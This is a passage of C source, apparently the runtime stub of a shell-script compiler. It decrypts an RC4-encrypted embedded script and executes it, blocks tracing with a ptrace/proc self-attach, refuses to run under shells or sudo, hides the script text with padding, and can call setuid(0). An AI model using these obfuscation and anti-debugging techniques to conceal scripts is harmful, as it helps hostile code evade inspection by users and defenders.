        && (strcmp(name, "/bin/bash") != 0) 
        && (strcmp(name, "sh") != 0) 
        && (strcmp(name, "/bin/sh") != 0) 
        && (strcmp(name, "sudo") != 0) 
        && (strcmp(name, "/bin/sudo") != 0) 
        && (strcmp(name, "/usr/bin/sudo") != 0)
        && (strcmp(name, "gksudo") != 0) 
        && (strcmp(name, "/bin/gksudo") != 0) 
        && (strcmp(name, "/usr/bin/gksudo") != 0) 
        && (strcmp(name, "kdesu") != 0) 
        && (strcmp(name, "/bin/kdesu") != 0) 
        && (strcmp(name, "/usr/bin/kdesu") != 0) 
       )
    {
        printf("Operation not permitted\n");
        kill(getpid(), SIGKILL);
        exit(1);
    }
}

#endif /* HARDENING */

#if !TRACEABLE

#define _LINUX_SOURCE_COMPAT
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>

#if !defined(PT_ATTACHEXC) /* New replacement for PT_ATTACH */
   #if !defined(PTRACE_ATTACH) && defined(PT_ATTACH)
       #define PT_ATTACHEXC	PT_ATTACH
   #elif defined(PTRACE_ATTACH)
       #define PT_ATTACHEXC PTRACE_ATTACH
   #endif
#endif

void untraceable(char * argv0)
{
	char proc[80];
	int pid, mine;

	switch(pid = fork()) {
	case  0:
		pid = getppid();
		/* For problematic SunOS ptrace */
#if defined(__FreeBSD__)
		sprintf(proc, "/proc/%d/mem", (int)pid);
#else
		sprintf(proc, "/proc/%d/as",  (int)pid);
#endif
		close(0);
		mine = !open(proc, O_RDWR|O_EXCL);
		if (!mine && errno != EBUSY)
			mine = !ptrace(PT_ATTACHEXC, pid, 0, 0);
		if (mine) {
			kill(pid, SIGCONT);
		} else {
			perror(argv0);
			kill(pid, SIGKILL);
		}
		_exit(mine);
	case -1:
		break;
	default:
		if (pid == waitpid(pid, 0, 0))
			return;
	}
	perror(argv0);
	_exit(1);
}
#endif /* !TRACEABLE */

char * xsh(int argc, char ** argv)
{
	char * scrpt;
	int ret, i, j;
	char ** varg;
	char * me = argv[0];
	if (me == NULL) { me = getenv("_"); }
	if (me == 0) { fprintf(stderr, "E: neither argv[0] nor $_ works."); exit(1); }

	ret = chkenv(argc);
	stte_0();
	 key(pswd, pswd_z);
	arc4(msg1, msg1_z);
	arc4(date, date_z);
	if (date[0] && (atoll(date)<time(NULL)))
		return msg1;
	arc4(shll, shll_z);
	arc4(inlo, inlo_z);
	arc4(xecc, xecc_z);
	arc4(lsto, lsto_z);
	arc4(tst1, tst1_z);
	 key(tst1, tst1_z);
	arc4(chk1, chk1_z);
	if ((chk1_z != tst1_z) || memcmp(tst1, chk1, tst1_z))
		return tst1;
	arc4(msg2, msg2_z);
	if (ret < 0)
		return msg2;
	varg = (char **)calloc(argc + 10, sizeof(char *));
	if (!varg)
		return 0;
	if (ret) {
		arc4(rlax, rlax_z);
		if (!rlax[0] && key_with_file(shll))
			return shll;
		arc4(opts, opts_z);
#if HARDENING
	    arc4_hardrun(text, text_z);
	    exit(0);
       /* Seccomp Sandboxing - Start */
       seccomp_hardening();
#endif
		arc4(text, text_z);
		arc4(tst2, tst2_z);
		 key(tst2, tst2_z);
		arc4(chk2, chk2_z);
		if ((chk2_z != tst2_z) || memcmp(tst2, chk2, tst2_z))
			return tst2;
		/* Prepend hide_z spaces to script text to hide it. */
		scrpt = malloc(hide_z + text_z);
		if (!scrpt)
			return 0;
		memset(scrpt, (int) ' ', hide_z);
		memcpy(&scrpt[hide_z], text, text_z);
	} else {			/* Reexecute */
		if (*xecc) {
			scrpt = malloc(512);
			if (!scrpt)
				return 0;
			sprintf(scrpt, xecc, me);
		} else {
			scrpt = me;
		}
	}
	j = 0;
#if BUSYBOXON
	varg[j++] = "busybox";
	varg[j++] = "sh";
#else
	varg[j++] = argv[0];		/* My own name at execution */
#endif
	if (ret && *opts)
		varg[j++] = opts;	/* Options on 1st line of code */
	if (*inlo)
		varg[j++] = inlo;	/* Option introducing inline code */
	varg[j++] = scrpt;		/* The script itself */
	if (*lsto)
		varg[j++] = lsto;	/* Option meaning last option */
	i = (ret > 1) ? ret : 0;	/* Args numbering correction */
	while (i < argc)
		varg[j++] = argv[i++];	/* Main run-time arguments */
	varg[j] = 0;			/* NULL terminated array */
#if DEBUGEXEC
	debugexec(shll, j, varg);
#endif
	execvp(shll, varg);
	return shll;
}

int main(int argc, char ** argv)
{
#if SETUID
   setuid(0);
#endif
#if DEBUGEXEC
	debugexec("main", argc, argv);
#endif
#if HARDENING
	hardening();
#endif
#if !TRACEABLE
	untraceable(argv[0]);
#endif
	argv[1] = xsh(argc, argv);
	fprintf(stderr, "%s%s%s: %s\n", argv[0],
		errno ? ": " : "",
		errno ? strerror(errno) : "",
		argv[1] ? argv[1] : "<null>"
	);
	return 1;
}
